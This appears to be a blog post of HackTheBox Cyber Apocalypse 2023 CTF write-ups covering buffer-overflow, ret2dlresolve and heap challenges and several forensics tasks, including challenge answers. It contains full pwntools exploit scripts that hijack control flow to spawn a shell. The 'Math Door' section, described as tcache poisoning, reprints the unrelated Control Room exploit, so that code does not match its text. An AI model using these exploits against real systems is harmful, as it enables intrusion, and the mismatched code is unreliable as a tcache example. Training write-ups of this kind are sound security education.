In this post, I have covered HackTheBox Cyber Apocalypse CTF 2023 Writeups in the form of written text and videos.
HackTheBox Questionnaire
It’s time to learn some things about binaries and basic c. Connect to a remote server and answer some questions to get the flag.
Category
Reversing and Buffer Overflow
Methodology
we covered the basic steps to take in order to analyze a binary using several tools such as checksec and Gdb debugger. The purpose is to check the binary architecture, shellcode execution protections and whether it’s vulnerable to buffer overflow.
Video Walkthrough
HackTheBox Getting Started
Get ready for the last guided challenge and your first real exploit. It’s time to show your hacking skills.
Methodology
We covered a guided example of exploiting a vulnerable application to buffer overflow. We generated a payload consisted of ‘A’s to overflow the stack enough to reach the desired spot.
Category
Reversing and Buffer Overflow
Video Walkthrough
HackTheBox Void
The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.
Methodology
We covered an example of exploiting Buffer Overflow vulnerability using Ret2dlresolve method with PWN tools from python. The method links a function of choice to the binary to enable code execution. Given that data is a 64-byte char array and that read is reading up to 200 bytes before saving the information at data, there is a clear buffer overflow vulnerability. As a result, we can alter values that appear after the buffer set aside for data and manage the program’s execution flow.
This time, there are just one or two external functions (read), therefore the binary does not contain many primitives. We don’t, for instance, have any functions that could leak function pointers.
There is a method called ret2dlresolve that can be applied in this circumstance to exploit the binary. I won’t go into all the specifics of the method. The fundamental idea is to deceive the computer into resolving a function that is not tied to the binary. For instance, since invoking system(“/bin/sh”) will be of interest to us, it is important that the binary resolve system even though it is not linked.
Category
Reversing and Buffer Overflow
Python Code
# Beginning of the code
#!/usr/bin/env python3
from pwn import *
context.binary = ‘void’
rop = ROP(context.binary)
dlresolve = Ret2dlresolvePayload(context.binary, symbol=’system’, args=[‘/bin/sh\0’])
rop.read(0, dlresolve.data_addr)
rop.raw(rop.ret[0])
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()
if len(sys.argv) == 1:
p = context.binary.process()
else:
host, port = sys.argv[1].split(‘:’)
p = remote(host, port)
p.sendline(b’A’ * 72 + raw_rop)
p.sendline(dlresolve.payload)
p.interactive()
# End of the code
Video Walkthrough
HackTheBox Control Room
After unearthing the crashed alien spacecraft you have hacked your way into it’s interior. Nothing seems perticularily interesting until you find the spacecraft’s control room. Filled with monitors, buttons and panels this room surely contains a lot of important information, including the coordinates of the underground alien vessels that you ‘ve been looking for. You decide to start off by booting up the main computer. You hear an uncanny buzzing-like noise and then a monitor lights up requesting you to enter a username. Can you take control of the Control Room?
Methodology
We covered another buffer overflow scenario as part of Cyber Apocalypse track. This scenario involved a binary that takes user input as a username and assigns it a default privilege. By locating the responsible function we were able to switch to the highest privilege and discover more functions which led us to “configure engine” function that contained a Out of Bounds Write vulnerability one two of the variables used in the code. Using this knowledge, we were able to leak memory addresses from the stack including the Glibc and control the execution of the code to get a shell.
Python Code
# Beginning of the code
#!/usr/bin/env python3
from pwn import *
from typing import Tuple
context.binary = elf = ELF(‘control_room’)
glibc = ELF(‘libc.so.6’, checksec=False)
def get_process():
if len(sys.argv) == 1:
return elf.process()
host, port = sys.argv[1].split(‘:’)
return remote(host, port)
def write_what_where(p, what: Tuple[int, int], where: int):
p.sendlineafter(b’Option [1-5]: ‘, b’1’)
p.sendlineafter(b’Engine number [0-3]: ‘, str((where – elf.sym.engines) // 16).encode())
p.sendlineafter(b’Thrust: ‘, str(what[0]).encode())
p.sendlineafter(b’Mixture ratio: ‘, str(what[1]).encode())
p.sendlineafter(b’Do you want to save the configuration? (y/n) \n> ‘, b’y’)
def main():
p = get_process()
p.sendlineafter(b’Enter a username: ‘, b’A’ * 256)
p.sendlineafter(b’New username size: ‘, b’256’)
p.sendlineafter(b’Enter your new username: ‘, b’asdf’)
p.sendlineafter(b’Option [1-5]: ‘, b’5’)
p.sendlineafter(b’New role: ‘, b’1’)
p.sendlineafter(b’Option [1-5]: ‘, b’1’)
p.sendlineafter(b’Engine number [0-3]: ‘, b’9\n’)
p.sendlineafter(b’Do you want to save the configuration? (y/n) \n> ‘, b’y’)
stack_leak = u64(p.recvuntil(b’\x7f’, timeout=1)[-6:].ljust(8, b’\0′))
p.info(f’Leaked stack address: {hex(stack_leak)}’)
write_what_where(p, (elf.sym.user_edit, elf.sym.user_edit), elf.got.exit)
write_what_where(p, (elf.plt.printf, elf.plt.printf), elf.got.free)
p.sendlineafter(b’Option [1-5]: ‘, b’0’)
p.sendlineafter(b’New username size: ‘, b’200’)
p.sendlineafter(b’Enter your new username: ‘, b’%3$lx’)
p.recvuntil(b’User updated successfully!\n\n’)
write_addr = int(p.recvline().decode()[:12], 16) – 23
p.info(f’Leaked write() address: {hex(write_addr)}’)
glibc.address = write_addr – glibc.sym.write
p.success(f’Glibc base address: {hex(glibc.address)}’)
write_what_where(p, (glibc.sym.system, glibc.sym.system), elf.got.free)
p.sendlineafter(b’Option [1-5]: ‘, b’0’)
p.sendlineafter(b’New username size: ‘, b’200’)
p.sendlineafter(b’Enter your new username: ‘, b’/bin/sh\0’)
p.recv()
p.interactive()
if __name__ == ‘__main__’:
main()
# End of the code
Video Walkthrough
HackTheBox Math Door
Pandora is making her way through the ancient city, but she finds herself in a room with only locked doors. One of them looks majestic, and it has lots of hieroglyphs written on its surface. After inspecting it, she realizes it’s all math: the door presents a problem and she has to solve it to go through to the heart of the ancient city. Will you be able to help her?
Methodology
The techniques to solve this challenge relies in heap exploitation. The discussed method below is TCACHE poisoning.
Tcache poisoning grants a potential write-what-where primitive. Also, the Tcache is a very exploitable structure because it applies only a few checks and they can be easily bypassed.
The gist here is to arranging heap blocks and modifying chunk sizes to redirect the program flow into the shellcode or the function that we want to execute. We want to set a new size for the chunks so that it doesn’t fit in the Tcache. Upon freeing the chunk again, the heap allocator will treated it as Unsorted Bin Chunk and set `fd` AND `bk` fields to point to an offset of our choosing.
The goal here is to fully control the Tcache which means we need to control a chunk located at the head of the Tcache free-list. Eventually the head of the Tcache will be set to point to a chunk that contained the Glibc pointers.
Python Code
# Beginning of the code
#!/usr/bin/env python3
from pwn import *
from typing import Tuple
context.binary = elf = ELF(‘control_room’)
glibc = ELF(‘libc.so.6’, checksec=False)
def get_process():
if len(sys.argv) == 1:
return elf.process()
host, port = sys.argv[1].split(‘:’)
return remote(host, port)
def write_what_where(p, what: Tuple[int, int], where: int):
p.sendlineafter(b’Option [1-5]: ‘, b’1’)
p.sendlineafter(b’Engine number [0-3]: ‘, str((where – elf.sym.engines) // 16).encode())
p.sendlineafter(b’Thrust: ‘, str(what[0]).encode())
p.sendlineafter(b’Mixture ratio: ‘, str(what[1]).encode())
p.sendlineafter(b’Do you want to save the configuration? (y/n) \n> ‘, b’y’)
def main():
p = get_process()
p.sendlineafter(b’Enter a username: ‘, b’A’ * 256)
p.sendlineafter(b’New username size: ‘, b’256’)
p.sendlineafter(b’Enter your new username: ‘, b’asdf’)
p.sendlineafter(b’Option [1-5]: ‘, b’5’)
p.sendlineafter(b’New role: ‘, b’1’)
p.sendlineafter(b’Option [1-5]: ‘, b’1’)
p.sendlineafter(b’Engine number [0-3]: ‘, b’9\n’)
p.sendlineafter(b’Do you want to save the configuration? (y/n) \n> ‘, b’y’)
stack_leak = u64(p.recvuntil(b’\x7f’, timeout=1)[-6:].ljust(8, b’\0′))
p.info(f’Leaked stack address: {hex(stack_leak)}’)
write_what_where(p, (elf.sym.user_edit, elf.sym.user_edit), elf.got.exit)
write_what_where(p, (elf.plt.printf, elf.plt.printf), elf.got.free)
p.sendlineafter(b’Option [1-5]: ‘, b’0’)
p.sendlineafter(b’New username size: ‘, b’200’)
p.sendlineafter(b’Enter your new username: ‘, b’%3$lx’)
p.recvuntil(b’User updated successfully!\n\n’)
write_addr = int(p.recvline().decode()[:12], 16) – 23
p.info(f’Leaked write() address: {hex(write_addr)}’)
glibc.address = write_addr – glibc.sym.write
p.success(f’Glibc base address: {hex(glibc.address)}’)
write_what_where(p, (glibc.sym.system, glibc.sym.system), elf.got.free)
p.sendlineafter(b’Option [1-5]: ‘, b’0’)
p.sendlineafter(b’New username size: ‘, b’200’)
p.sendlineafter(b’Enter your new username: ‘, b’/bin/sh\0’)
p.recv()
p.interactive()
if __name__ == ‘__main__’:
main()
# End of the code
HackTheBox Alien Cradle
In an attempt for the aliens to find more information about the relic, they launched an attack targeting Pandora’s close friends and partners that may know any secret information about it. During a recent incident believed to be operated by them, Pandora located a weird PowerShell script from the event logs, otherwise called PowerShell cradle. These scripts are usually used to download and execute the next stage of the attack. However, it seems obfuscated, and Pandora cannot understand it. Can you help her deobfuscate it?
Methodology
This challenge was fairly ease challenge. A Powershell script is given that attempts to download files from the web to establish persistence. The script contains the challenge flag whose characters are separated by a plus sign
Category
Forensics
Video Walkthrough
HackTheBox Extraterrestrial Persistence
There is a rumor that aliens have developed a persistence mechanism that is impossible to detect. After investigating her recently compromised Linux server, Pandora found a possible sample of this mechanism. Can you analyze it and find out how they install their persistence?
Category
Forensics
Methodology
We are given a bash script that contained a base64 encoded string when decoded gave the challenge flag.
Video Walkthrough
HackTheBox Packet Cyclone
Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
Category
Forensics
Methodology
We covered parsing and investigating Windows event logs and Sysmon logs to extract artifacts related to a host compromise. The challenge required extracting the attacker’s email address, password, cloud storage used for exfiltration in addition to the files/directories that were the target for the exfiltration.
Video Walk-through and Challenge Answers
1. What is the email of the attacker used for the exfiltration process? (for example: name@email.com)
majmeret@protonmail.com
2. What is the password of the attacker used for the exfiltration process?
FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI
3. What is the Cloud storage provider used by the attacker?
Mega
4. What is the ID of the process used by the attackers to configure their tool?
PID is 3820
5. What is the name of the folder the attacker exfiltrated; provide the full path.
C:\Users\Wade\Desktop\Relic_location
6. What is the name of the folder the attacker exfiltrated the files to?
exfiltration
Flag
Flag: HTB{3v3n_3xtr4t3rr3str14l_B31nGs_us3_Rcl0n3_n0w4d4ys}
HackTheBox Artifact Of Dangerous Sighting
Pandora has been using her computer to uncover the secrets of the elusive relic. She has been relentlessly scouring through all the reports of its sightings. However, upon returning from a quick coffee break, her heart races as she notices the Windows Event Viewer tab open on the Security log. This is so strange! Immediately taking control of the situation she pulls out the network cable, takes a snapshot of her machine and shuts it down. She is determined to uncover who could be trying to sabotage her research, and the only way to do that is by diving deep down and following all traces …
Category
Forensics
Methodology
We covered a blue team scenario where we investigated a virtual hard disk snapshot for Windows system. We investigated Powershell console history and discovered traces of Powershell script embedded as an alternate data streams in a DLL file. After revealing the contents of the script, it is revealed as an encoded base64 with null bytes and obfuscation. De-obfuscating the script started with decoding it from base64 and removing the null bytes using CyberChef. The script was still obfuscated so we executed every single part of it before the pipe character that came at the end of it. This resulted in a bunch of chars that when executed again with Powershell revealed the contents of the script and the flag.
Video Walk-through
HackTheBox Relic Maps
Pandora received an email with a link claiming to have information about the location of the relic and attached ancient city maps, but something seems off about it. Could it be rivals trying to send her off on a distraction? Or worse, could they be trying to hack her systems to get what she knows?Investigate the given attachment and figure out what’s going on and get the flag. The link is to http://relicmaps.htb:/relicmaps.one. The document is still live (relicmaps.htb should resolve to your docker instance).
Methodology
We covered a scenario where we downloaded an attachment that turned out to be a Windows bat file. Inside the Windows bat file, we were able to echo out the Powershell commands it executes to the terminal. The Powershell command contained encryption keys and Initialization vector IV for an encryption algorithm AES in CBC mode. It was there to encrypt the actual windows.bat.exe that was getting executed everytime the bat file was opened. By using Cyberchef along with the decryption key, we were able to decrypt and save the original executable file that contained the flag.
Video Walk-through